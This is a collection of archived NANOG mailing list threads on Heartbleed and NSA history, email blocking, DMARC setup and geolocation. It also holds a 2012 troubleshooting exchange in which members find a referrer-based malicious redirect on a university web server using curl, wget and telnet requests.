In WW2 we protected the secret of having cracked enigma by deliberately 
ignoring a lot of the knowledge we gained. So such things have happened. But we 
didn't use enigma ourselves -- none of our secrets were at risk. And our 
adversaries today have no secrets more valuable than our own.

-Bill





RE: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

2014-04-14 Thread Matthew Black
IIRC, the message was sent via courier instead of cable or telephone to prevent 
interception. Did the military not even trust its own cryptographic methods? Or 
did they not think withdrawal of the Japanese ambassador was not very critical?

matthew black
california state university, long beach

From: Donald Eastlake [mailto:d3e...@gmail.com]
Sent: Monday, April 14, 2014 8:28 AM
To: Matthew Black
Cc: William Herrin; nanog@nanog.org
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

Matthew,

On Mon, Apr 14, 2014 at 10:48 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
Also on this same idea, in his book "The Puzzle Palace," James Bamford claims 
that we knew of the pending attack on Pearl Harbor but did nothing, because 
that would compromise we broke the Japanese Purple Cipher.

I assume you refer to pages 36 through 39 of "The Puzzle Palace" which is 
almost entirely a recounting of bureaucratic fumbling and delay. The 
sensitivity of a Purple Cipher decode did cause the intercepted information to 
be sent by a less immediate means to the US Naval authorities in Hawaii. 
Nevertheless, it was sent with every expectation that those authorities would 
receive it before the time of the attack. We do not know what those authorities 
would have done if they had received the intercept information as expected, 
instead of receiving it about 6 hours after the first bomb struck Pearl Harbor. 
Your implication that Bamford says "we decided to do nothing" bears no 
relationship to what Bamford actually wrote.

Thanks,
Donald
=
 Donald E. Eastlake 3rd   +1-508-333-2270 (cell)
 155 Beaver Street, Milford, MA 01757 USA
 d3e...@gmail.com

matthew black
california state university, long beach


-Original Message-
From: William Herrin [mailto:b...@herrin.us]
Sent: Friday, April 11, 2014 2:06 PM
To: nanog@nanog.org
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

On Fri, Apr 11, 2014 at 4:10 PM, Niels Bakker <na...@bakker.net> wrote:
> Please go read up on some recent and less recent history before making
> judgments on what would be unusually gutsy for that group of people.
>
> I'm not saying this has been happening but you will have to come up
> with a better defense than "it seems unlikely to me personally".

Let me know when someone finds the second shooter on the grassy knoll.
As for me, I do have some first hand knowledge as to exactly how sensitive 
several portions of the federal government are to the security of the servers 
which hold their data. They may not hold YOUR data in high regard... but the 
word "sensitive" does not do justice to the attention lavished on THEIR 
servers' security.

In WW2 we protected the secret of having cracked enigma by deliberately 
ignoring a lot of the knowledge we gained. So such things have happened. But we 
didn't use enigma ourselves -- none of our secrets were at risk. And our 
adversaries today have no secrets more valuable than our own.

-Bill





RE: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

2014-04-15 Thread Matthew Black
From: Doug Barton [mailto:do...@dougbarton.us] 
> When you say "clear the disk allocated to programs" what do you mean
> exactly?

Seriously? When files are deleted, their sectors are simply released to the 
free space pool without erasing their contents. Allocation of disk sectors 
without clearing them gives users/programs access to file contents previously 
stored by other users/programs.

As to why this is a problem, well, as they write in some math textbooks, the 
answer is trivial and left as an exercise to the reader. Well, usually trivial.

matthew black
california state university, long beach


-Original Message-
From: Doug Barton [mailto:do...@dougbarton.us] 
Sent: Monday, April 14, 2014 7:48 PM
To: nanog@nanog.org
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

On 04/14/2014 05:50 PM, John Levine wrote:
> In article <534c68f4@cox.net> you write:
>> On 4/14/2014 9:38 AM, Matthew Black wrote:
>>> Shouldn't a decent OS scrub RAM and disk sectors before allocating
>>> them to processes, unless that process enters processor privileged
>>> mode and sets a call flag? I recall digging through disk sectors on
>>> RSTS/E to look for passwords and other interesting stuff over 30
>>> years ago.
>>
>> I have been out of the loop for quite a while but my strongly held
>> belief is that such scrubbing would be an enormous (and intolerable)
>> overhead ...
>
> It must be quite a while.  Unix systems have routinely cleared the RAM
> and disk allocated to programs since the earliest days.

When you say "clear the disk allocated to programs" what do you mean 
exactly?







nanog@nanog.org

2015-01-29 Thread Matthew Black
Our university just received notice from AT&T that our e-mail is being blocked 
without much explanation. As all universities send e-mail to the students and 
employees, it is impossible to tell what triggered AT&T's actions.

Does anyone have an AT&T contact? If you are from AT&T, please contact me 
off-line.

Thanks.

matthew black
e-mail postmaster
california state university, long beach


-Original Message-
From: test_re...@att.net [mailto:test_re...@att.net] 
Sent: Wednesday, January 28, 2015 4:58 PM
Subject: Blocked Email Notification

Dear Postmaster:

We are writing to let you know that we are blocking messages addressed to one 
of our customers at the domain att.net by one of your customers at domain 
csulb.edu. The stream of messages coming from your system appears to consist 
mostly of unwanted commercial e-mail (UCE, or "spam"). To protect our system 
and to ensure that it operates well for all of our customers, we have decided 
to block all messages originating from your system.

Please consult your logs to see what might be causing this situation and how it 
can be fixed. Then visit http://rbl.att.net/block_inquiry.html to request a 
removal of the block. Most requests for removal are honored within two days.

The specific error message received by your customer was:
550 Error - Blocked for abuse. See http://att.net/blocks

Thank you for your assistance in helping our respective customers communicate.

Best regards,

The AT&T Mail Team.


Yahoo postmaster

2015-04-27 Thread Matthew Black
One of our user’s e-mail messages to Yahoo bounced with the following link for 
more information: http://postmaster.yahoo.com/errors/postmaster-27.html

which redirects to 
https://help.yahoo.com/kb/postmaster/SLN5067.html?impressions=true



That page contains a link to “Yahoo Mail and Yahoo Messenger Terms of Service”, 
which is broken!

http://https//info.yahoo.com/legal/us/yahoo/mail/en-us/<http://https/info.yahoo.com/legal/us/yahoo/mail/en-us/>

It redirects to an https link  saying, Server not found.



I hope someone from Yahoo can fix this.



matthew black

california state university, long beach




RE: Fixing Google geolocation screwups

2015-05-05 Thread Matthew Black
Pedro Cavaca suggests:
> https://support.google.com/websearch/answer/873?hl=en

Correct me if I'm wrong, that looks like Google simply saves location data in a 
browser cookie.

"A location helps Google find more relevant information when you use Search, 
Maps, and other Google products. Learn how Google saves location information on 
this computer."


matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-bounces+matthew.black=csulb@nanog.org] On Behalf 
Of Pedro Cavaca
Sent: Tuesday, April 07, 2015 3:41 PM
To: John Levine
Cc: NANOG Mailing List
Subject: Re: Fixing Google geolocation screwups

https://support.google.com/websearch/answer/873?hl=en


On 7 April 2015 at 23:26, John Levine  wrote:

> A friend of mine lives in Alabama and has business service from at&t.
> But Google thinks he's in France.  We've checked for various 
> possibilities of VPNs and proxies and such, and it's pretty clear that 
> the Goog's geolocation for addresses around 99.106.185.0/24 is screwed 
> up.  Bing and other services correctly find him in Alabama.
>
> Poking around I see lots of advice about how to use Google's 
> geolocation data, but nothing on how to update it.  Anyone know the 
> secret?  TIA
>
> Regards,
> John Levine, jo...@iecc.com, Primary Perpetrator of "The Internet for 
> Dummies", Please consider the environment before reading this e-mail. 
> http://jl.ly
>
>
>


RE: Google contact?

2015-06-17 Thread Matthew Black
Hopefully, they sent you advance notice.

Google Apps for ISP EOL
https://productforums.google.com/forum/#!topic/apps/_zgHXEBjwKU


matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Christopher Tyler
Sent: Wednesday, June 17, 2015 6:29 AM
To: nanog@nanog.org
Subject: Google contact?

Need some help.. Does anyone have an email contact at Google that they are 
willing to pass along?
All of our mowisp.net Apps for ISP accounts were disabled last night at about 
8-9PM without notice and we are now getting swamped with calls. Possibly 
several hundred users affected.

-- 
Christopher Tyler 
MTCRE/MTCNA/MTCTCE/MTCWE 
Total Highspeed Internet Services 
417.851.1107



DMARC in education

2015-06-17 Thread Matthew Black
Looking at implementing DMARC for my institution. We currently have an SPF 
record and use DKIM to sign a small subset of messages. Rollout recommendations 
for DMARC suggest initially creating a "p=none" record to gather information on 
how a domain is being used. The RUA tag specifies a URI of where to send daily 
reports.

Trying to get an idea of how many reports to expect a day or two after the dust 
settles. Does anyone use an aggregator to process their feedback (RUA tag) 
and/or forensic reports (RUF tag)?

DMARC information.
https://dmarc.org/


See slide 38 of 93 at 
http://www.slideshare.net/kka7/fighting-email-abuse-with-dmarc?qid=5e90be27-3fc0-41ed-9d71-253978cc6a12&v=default&b=&from_search=2

Everyone's first DMARC record
V=DMARC1; p=none; rua=mailto:aggreg...@example.com;


Cheers!

matthew black
information technology services
california state university, long beach
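
The p=none rollout described in the message above produces aggregate (RUA) reports as XML. The following is an added example, not part of the original thread, of how such a report can be reduced to the sources that would fail once the policy is tightened. The report layout follows RFC 7489 Appendix C; the sample report, domain names and function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed aggregate report in the RFC 7489 Appendix C layout; every value is made up.
SAMPLE_REPORT = """<feedback>
  <report_metadata>
    <org_name>receiver.example</org_name>
    <report_id>constructed-0001</report_id>
    <date_range><begin>1434499200</begin><end>1434585599</end></date_range>
  </report_metadata>
  <policy_published><domain>example.edu</domain><p>none</p><pct>100</pct></policy_published>
  <record>
    <row><source_ip>192.0.2.10</source_ip><count>1200</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.edu</header_from></identifiers>
  </record>
  <record>
    <row><source_ip>198.51.100.25</source_ip><count>340</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>pass</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.edu</header_from></identifiers>
  </record>
  <record>
    <row><source_ip>203.0.113.77</source_ip><count>85</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.edu</header_from></identifiers>
  </record>
  <record>
    <row><source_ip>203.0.113.77</source_ip><count>15</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated>
    </row>
    <identifiers><header_from>lists.example.edu</header_from></identifiers>
  </record>
</feedback>"""


def _strip_ns(root):
    """Some reporters add an XML namespace to <feedback>; drop it so paths match."""
    for el in root.iter():
        if isinstance(el.tag, str) and "}" in el.tag:
            el.tag = el.tag.split("}", 1)[1]


def summarize(xml_text):
    """Aggregate one RUA report per source IP into DMARC pass/fail message counts."""
    root = ET.fromstring(xml_text)
    _strip_ns(root)
    sources = defaultdict(lambda: {"pass": 0, "fail": 0})
    for rec in root.iter("record"):
        ip = (rec.findtext("row/source_ip") or "").strip()
        count_text = (rec.findtext("row/count") or "").strip()
        if not ip or not count_text.isdigit():
            continue  # skip malformed rows rather than guessing
        # policy_evaluated holds the alignment-aware results; DMARC passes
        # when either the DKIM or the SPF result is "pass".
        dkim = (rec.findtext("row/policy_evaluated/dkim") or "").strip().lower()
        spf = (rec.findtext("row/policy_evaluated/spf") or "").strip().lower()
        verdict = "pass" if "pass" in (dkim, spf) else "fail"
        sources[ip][verdict] += int(count_text)
    sources = {ip: dict(v) for ip, v in sources.items()}
    return {
        "reporter": root.findtext("report_metadata/org_name", default="?"),
        "domain": root.findtext("policy_published/domain", default="?"),
        "policy": root.findtext("policy_published/p", default="?"),
        "messages": sum(v["pass"] + v["fail"] for v in sources.values()),
        "failing": sum(v["fail"] for v in sources.values()),
        "sources": sources,
    }


def failing_sources(summary):
    """Sources whose mail would be quarantined or rejected under a stricter policy."""
    rows = [(ip, v["fail"]) for ip, v in summary["sources"].items() if v["fail"]]
    return sorted(rows, key=lambda r: r[1], reverse=True)


if __name__ == "__main__":
    s = summarize(SAMPLE_REPORT)
    print(f'{s["reporter"]} -> {s["domain"]} (p={s["policy"]}): '
          f'{s["failing"]} of {s["messages"]} messages fail DMARC')
    for ip, n in failing_sources(s):
        print(f"  {ip}: {n} failing")
```
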


DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Google Safe Browsing and Firefox have marked our website as containing malware. 
They claim our home page returns no results, but redirects users to another 
compromised website couchtarts.com.

We have thoroughly examined our root .htaccess and httpd.conf files and are not 
redirecting to the problem target site. No recent changes either.

We ran some NSLOOKUPs against various public DNS servers and intermittently get 
results that are NOT our servers.

We believe the DNS servers used by Google's crawler have been poisoned.

Can anyone shed some light on this?

matthew black
information technology services
california state university, long beach
www.csulb.edu



RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Running Apache on three Solaris webservers behind a load balancer. No MS 
Windows!

Not sure how malicious software could get between our load balancer and Unix 
servers. Thanks for the tip!

matthew black
information technology services
california state university, long beach



From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 9:07 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

Is it possible that some malicious software is listening and injecting a 
redirect on the wire?  We've seen this before with a Windows machine being 
infected.
On 26 June 2012 20:53, Matthew Black <matthew.bl...@csulb.edu> wrote:
Google Safe Browsing and Firefox have marked our website as containing malware. 
They claim our home page returns no results, but redirects users to another 
compromised website couchtarts.com.

We have thoroughly examined our root .htaccess and httpd.conf files and are not 
redirecting to the problem target site. No recent changes either.

We ran some NSLOOKUPs against various public DNS servers and intermittently get 
results that are NOT our servers.

We believe the DNS servers used by Google's crawler have been poisoned.

Can anyone shed some light on this?

matthew black
information technology services
california state university, long beach
www.csulb.edu



--
Landon Stewart <lstew...@superb.net>
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": 
http://www.superbhosting.net



RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Running Apache on three Solaris servers behind a load balancer.

I forgot how to lookup our AS number to see if it matches couchtarts.

matthew black
information technology services
california state university, long beach


-Original Message-
From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com] 
Sent: Tuesday, June 26, 2012 9:14 PM
To: nanog@nanog.org
Subject: RE: DNS poisoning at Google?

Typically if google were pulling your site sometimes from the wrong IP, their 
safe browsing page should indicate it being on another AS number in addition to 
the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu

For example, the couchtarts site they claim yours is redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com

That site's DNS is screwed up and some requests are sent to a different IP at a 
different host, so Google picked up both AS numbers.

Could one of your domain's subdomains be what is actually infected?  You seem 
to have a bunch of them, maybe google is penalizing the whole domain over a 
subdomain?  Not sure if they do that or not.

If your sites are running off of an application like wordpress, etc., you may 
not get the same page that google gets and the application may have been hacked.
Here's a wget command you can use to make requests to your site pretending to 
be google:

wget -c \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
--output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making it not correct so 
you'll have to put it back together correctly.  It will save the output to a 
file named googlebot.html you can look at to see if anything weird ends up 
being served.

David


> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org
> Subject: DNS poisoning at Google?
> 
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects 
> users to another compromised website couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files 
> and are not redirecting to the problem target site. No recent changes 
> either.
> 
> We ran some NSLOOKUPs against various public DNS servers and 
> intermittently get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been 
> poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach 
> www.csulb.edu
> 
> 
> 






RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Yes, we’ve used the Google Webmaster Tools a lot today. Submitted multiple 
requests and they keep insisting that our site issues a redirect. Unable to 
duplicate the problem here.

matthew black
information technology services
california state university, long beach

From: Ishmael Rufus [mailto:sakam...@gmail.com]
Sent: Tuesday, June 26, 2012 9:34 PM
To: Matthew Black
Cc: David Hubbard; nanog@nanog.org
Subject: Re: DNS poisoning at Google?

Have you tried using Google Webmaster tools?
On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:
Running Apache on three Solaris servers behind a load balancer.

I forgot how to lookup our AS number to see if it matches couchtarts.

matthew black
information technology services
california state university, long beach

-Original Message-
From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com]
Sent: Tuesday, June 26, 2012 9:14 PM
To: nanog@nanog.org
Subject: RE: DNS poisoning at Google?

Typically if google were pulling your site sometimes from the wrong IP, their 
safe browsing page should indicate it being on another AS number in addition to 
the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu

For example, the couchtarts site they claim yours is redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com

That site's DNS is screwed up and some requests are sent to a different IP at a 
different host, so Google picked up both AS numbers.

Could one of your domain's subdomains be what is actually infected?  You seem 
to have a bunch of them, maybe google is penalizing the whole domain over a 
subdomain?  Not sure if they do that or not.

If your sites are running off of an application like wordpress, etc., you may 
not get the same page that google gets and the application may have been hacked.
Here's a wget command you can use to make requests to your site pretending to 
be google:

wget -c \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
--output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making it not correct so 
you'll have to put it back together correctly.  It will save the output to a 
file named googlebot.html you can look at to see if anything weird ends up 
being served.

David


> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org
> Subject: DNS poisoning at Google?
>
> Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects
> users to another compromised website couchtarts.com.
>
> We have thoroughly examined our root .htaccess and httpd.conf files
> and are not redirecting to the problem target site. No recent changes
> either.
>
> We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been
> poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu
>
>
>






RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Q: have you consulted the logs?

Seriously? Our servers have multiple log files due to multiple virtual hosts. 
Our primary domain log file on just one server has over 600,000 records x 3 
servers.

Probably over 100,000 304 redirects in our logs.

couchtarts.com does not appear in our log files.


matthew black
information technology services
california state university, long beach

-Original Message-
From: Michael J Wise [mailto:mjw...@kapu.net] 
Sent: Tuesday, June 26, 2012 9:56 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?


On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:

> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.

... have you consulted the logs?
If the redirect is there, it ... 1) might not be from the home page, and 2) 
could be in ... user content?

awk '{if ($9 ~ /304/) { print $0 }}' access_log.
... or some such.
Granted, might be a storm of " " -> index.html redirects, but they should be 
grep -v 'able in short order.
You might also look for the rDNS of the Google spider to see exactly where it 
is looking, and what it sees.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."






RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach





-Original Message-
From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com] 
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:24 PM, Matthew Black  wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
> 
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
> 
> matthew black
> information technology services
> california state university, long beach
> 
> 
> 
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black <matthew.bl...@csulb.edu> wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
> 
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach 
> www.csulb.edu
> 
> 
> 
> --
> Landon Stewart <lstew...@superb.net>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead 
> of the Rest": 
> http://www.superbhosting.net
> 
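
The referrer-dependent redirect that Jeremy Hanmer's curl test shows can be hunted for in every Apache config file under the document root, not just the root .htaccess. The following is an added example, not part of the original thread: it flags rewrite rules that send visitors off-site only when a Referer or User-Agent condition matches. The sample file, the domains example.edu and redirect.example.net, and the function names are constructed for illustration.

```python
import os
import re

# Request attributes that a conditional (cloaked) redirect typically keys on.
SUSPECT_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")

COND_RE = re.compile(r"^RewriteCond\s+(\S+)\s+(.+)$", re.I)
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)
URL_HOST_RE = re.compile(r"^https?://([^/:\s]+)", re.I)

# Constructed sample, not taken from any real server.
SAMPLE_HTACCESS = r"""
# constructed sample
RewriteEngine On
# legitimate: canonical host redirect, stays on-site
RewriteCond %{HTTP_HOST} ^example\.edu$ [NC]
RewriteRule ^(.*)$ http://www.example.edu/$1 [R=301,L]
# suspicious: off-site redirect only for search-engine referrals and crawlers
RewriteCond %{HTTP_REFERER} \
    (google|bing|yahoo)\. [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Googlebot [NC]
RewriteRule ^(.*)$ http://redirect.example.net/media.php [R=301,L]
"""


def logical_lines(text):
    """Yield (first_line_number, line) with backslash continuations joined
    and blank lines and comments dropped."""
    buf, start = "", None
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.rstrip()
        if start is None:
            start = n
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip() and not buf.lstrip().startswith("#"):
            yield start, buf.strip()
        buf, start = "", None


def is_own_host(host, own_domains):
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in own_domains)


def scan_text(text, own_domains):
    """Return one finding per RewriteRule that redirects to a foreign host
    and is guarded by a Referer or User-Agent RewriteCond."""
    findings, pending = [], []   # pending: RewriteCond lines awaiting their rule
    for lineno, line in logical_lines(text):
        m = COND_RE.match(line)
        if m:
            pending.append((lineno, m.group(1)))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        conds, pending = pending, []   # conditions apply to this rule only
        host = URL_HOST_RE.match(m.group(2))
        if not host or is_own_host(host.group(1), own_domains):
            continue
        keyed_on = sorted({v for _, test in conds
                           for v in SUSPECT_VARS if v in test.upper()})
        if keyed_on:
            findings.append({
                "line": lineno,
                "target_host": host.group(1).lower(),
                "keyed_on": keyed_on,
                "conditions": [n for n, _ in conds],
            })
    return findings


def scan_tree(root, own_domains, names=(".htaccess", "httpd.conf")):
    """Scan every matching config file below root; returns {path: findings}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in names:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read(), own_domains)
                if found:
                    results[path] = found
    return results


if __name__ == "__main__":
    for f in scan_text(SAMPLE_HTACCESS, ["example.edu"]):
        print(f'line {f["line"]}: redirect to {f["target_host"]} '
              f'keyed on {", ".join(f["keyed_on"])}')
```

A clean result from this scan does not rule out the same logic living in application code or database content, which the message above also names as places to check.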






RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
I'm not familiar with curl and don't understand what I type and what are 
results. Are you suggesting that when google refers to our website, we pick 
that up and redirect to couchtarts?

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer [mailto:jer...@hq.newdream.net] 
Sent: Tuesday, June 26, 2012 9:59 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:35 PM, Matthew Black  wrote:

> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Ishmael Rufus [mailto:sakam...@gmail.com]
> Sent: Tuesday, June 26, 2012 9:34 PM
> To: Matthew Black
> Cc: David Hubbard; nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Have you tried using Google Webmaster tools?
> On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:
> Running Apache on three Solaris servers behind a load balancer.
> 
> I forgot how to lookup our AS number to see if it matches couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> -Original Message-
> From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org
> Subject: RE: DNS poisoning at Google?
> 
> Typically if google were pulling your site sometimes from the wrong IP, their 
> safe browsing page should indicate it being on another AS number in addition 
> to the correct one 2152:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu
> 
> For example, the couchtarts site they claim yours is redirecting to:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com
> 
> That site's DNS is screwed up and some requests are sent to a different IP at 
> a different host, so Google picked up both AS numbers.
> 
> Could one of your domain's subdomains be what is actually infected?  You seem 
> to have a bunch of them, maybe google is penalizing the whole domain over a 
> subdomain?  Not sure if they do that or not.
> 
> If your sites are running off of an application like wordpress, etc., you may 
> not get the same page that google gets and the application may have been 
> hacked.
> Here's a wget command you can use to make requests to your site pretending to 
> be google:
> 
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
> 
> nanog will probably line wrap that user agent line making it not correct so 
> you'll have to put it back together correctly.  It will save the output to a 
> file named googlebot.html you can look at to see if anything weird ends up 
> being served.
> 
> David
> 
> 
>> -Original Message-
>> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
>> Sent: Tuesday, June 26, 2012 11:53 PM
>> To: nanog@nanog.org
>> Subject: DNS poisoning at Google?
>> 
>> Google Safe Browsing and Firefox have marked our website as 
>> containing malware. They claim our home page returns no results, but 
>> redirects users to another compromised website couchtarts.com.
>> 
>> We have thoroughly examined our root .htaccess and httpd.conf files 
>> and are not redirecting to the problem target site. No recent changes 
>> either.
>> 
>> We ran some NSLOOKUPs against various public DNS servers and 
>> intermittently get results that are NOT our servers.
>> 
>> We believe the DNS servers used by Google's crawler have been 
>> poisoned.
>> 
>> Can anyone shed some light on this?
>> 
>> matthew black
>> information technology services
>> california state university, long beach 
>> www.csulb.edu
>> 
>> 
>> 
> 
> 
> 
> 






RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Thank you for that helpful instruction!

curl doesn't work because our webserver is firewalled against outbound traffic. 
The telnet to port 80 showed me the problem. I also didn't understand when 
output was placed at the end of the command line, instead of starting on the 
next line...that looked like something I was supposed to type.


matthew black
information technology services
california state university, long beach

-Original Message-
From: christopher.mor...@gmail.com [mailto:christopher.mor...@gmail.com] On 
Behalf Of Christopher Morrow
Sent: Tuesday, June 26, 2012 10:17 PM
To: Ishmael Rufus
Cc: Matthew Black; nanog@nanog.org; Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

for example, from the commandline with telnet:

morrowc@teensy:~$ telnet www.csulb.edu 80 Trying 134.139.1.60...
Connected to gaggle.its.csulb.edu.
Escape character is '^]'.
GET / HTTP/1.0
Host: www.csulb.edu
Referer: http://www.google.com/



HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:04:04 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Content-Length: 243
Connection: close
Content-Type: text/html; charset=iso-8859-1

 
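<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>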

Connection closed by foreign host.


oops :( fail.

On Wed, Jun 27, 2012 at 1:13 AM, Ishmael Rufus  wrote:
> Invoking the referrer on your site recommends a redirect to 
> couchtarts. I agree with Jeremy and Jeff check your htaccess files, 
> conf files and anything that  calls RewriteCond or Rewrite
>
> On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black 
> wrote:
>
>> Google Webtools reports a problem with our HOMEPAGE "/". That page is 
>> not redirecting anywhere.
>> They also report problems with some 48 other primary sites, none of 
